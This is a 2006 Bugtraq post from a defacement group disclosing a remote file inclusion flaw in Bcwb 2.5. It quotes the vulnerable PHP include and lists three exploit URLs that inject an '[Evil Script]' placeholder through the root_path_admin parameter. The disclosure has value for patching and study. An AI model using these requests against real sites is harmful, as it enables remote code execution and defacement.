Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Multiple Remote File Include Oct 30 2006 05:55PM
firewall1954 hotmail com
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall

# Application Affect:
Bcwb 2.5

# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download

# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');

# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[E
vil Script]

http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[
Evil Script]

http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Ev
il Script]

# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.

####################### Firewall #########################

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus